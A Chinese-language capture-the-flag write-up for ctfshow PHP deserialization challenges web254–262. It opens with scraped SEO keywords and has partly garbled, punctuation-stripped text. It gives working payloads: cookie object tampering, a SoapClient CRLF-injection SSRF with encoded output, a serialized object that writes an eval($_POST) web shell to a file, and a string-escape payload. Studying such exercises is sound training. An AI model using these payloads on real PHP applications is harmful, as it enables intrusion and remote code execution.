网站建设 福步,wordpress相册插件nextgen gallery,承德手机网站建设,网站建设与网页设计专业的PHP反序列化前置知识
序列化和反序列化
对象是不能在字节流中传输的#xff0c;序列化就是把对象转化为字符串以便存储和传输#xff0c;反序列化就是将字符串转化为对象
魔术方法
__construct() //构造#xff0c;当对象new时调用 __wakeup() //执行unserialize()时序列化就是把对象转化为字符串以便存储和传输反序列化就是将字符串转化为对象
魔术方法
__construct() //构造当对象new时调用 __wakeup() //执行unserialize()时先会调用这个函数 __sleep() //执行serialize()时先会调用这个函数 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法 __set() //用于将数据写入不可访问的属性 __isset() //在不可访问的属性上调用isset()或empty()触发 __unset() //在不可访问的属性上使用unset()时触发 __toString() //把类当作字符串使用时触发 __invoke() //当尝试将对象调用为函数时触发
链 web254 这里其实没有涉及反序列化。这题使用GET方式获取username和password的值创建一个ctfshowUser对象-代表指向首先调用上面的login方法login方法使用this代表前面的username和password的值为ctfshowUser的值xxxxxx如果满足条件就把 $this-isViptrue然后通过vipOneKeyGetFlag()通过判断获取flag构造?usernamexxxxxxpasswordxxxxxx即可
web255 这题的区别在于login方法不能把isvip置为true而且user为对cookie值进行反序列化的结果这里我们需要对class ctfShowUser进行序列化并且修改 public $isVipfalse为true,首先构造序列化然后将序列化结果以cookie方式传递
?php
class ctfShowUser{public $isViptrue;
}
$anew ctfShowUser;
echo urlencode(serialize($a));
?web256 这题需要构造username不等于password原来他们都是xxxxxx,现在需要通过序列化修改初始值
web257
__construct() //构造当对象new时调用 __destruct() //对象被销毁时触发 这题在新建对象时先实例化info然后在销毁时调用getinfo方法而我们的最终目的是调用backdoor的方法使用eval这个函数 web258
这题使用正则表达式过滤使用号绕过 web259 __call 在对象中调用一个不可访问方法时调用 在这道题中$vip-getFlag();因为调用了类中没有的方法所以会导致__call的执行 payload
?php
$target http://127.0.0.1/flag.php;
$post_string tokenctfshow;
$b new SoapClient(null,array(location $target,user_agentwupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded.^^Content-Length: .(string)strlen($post_string).^^^^.$post_string,uri ssrf));
$a serialize($b);
$a str_replace(^^,\r\n,$a);
echo urlencode($a);
?O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22ssrf%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A128%3A%22wupco%0D%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3Aapplication%2Fx-www-form-urlencoded%0D%0AContent-Length%3A13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7Dr 传入vip然后访问flag.txt即可
web260 此题只需要满足匹配条件就行
web261 题目是这样的构造payload
?phpclass ctfshowvip{public $username877.php;public $password?php eval($_POST[yc]); ?;
}
$anew ctfshowvip();
echo urlencode(serialize($a));
?首先__construct方法是创建对象时调用的我们现在给username和password赋予初值同时对象销毁时调用__destruct这里进行了弱类型比较0x36D877.php然后__unserialize() 和 __wakeup()两个魔术方法都定义在用一个对象中 则只有 __unserialize() 方法会生效__wakeup() 方法会被忽略。这里进行了字符串拼接
web262字符串逃逸 这题主要考察字符串逃逸 PHP 在反序列化时对类中不存在的属性也会进行反序列化 • PHP 在反序列化时底层代码是以 ;作为字段的分隔以 } 作为结尾(字符串除外)并且是根据长度判断内容的 序列化 需要构造 “;s:5:“token”;s:5:“admin”;}一共27字符 构造payload f1m1t1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck”;s:5:“token”;s:5:“admin”;}然后访问message.php即可
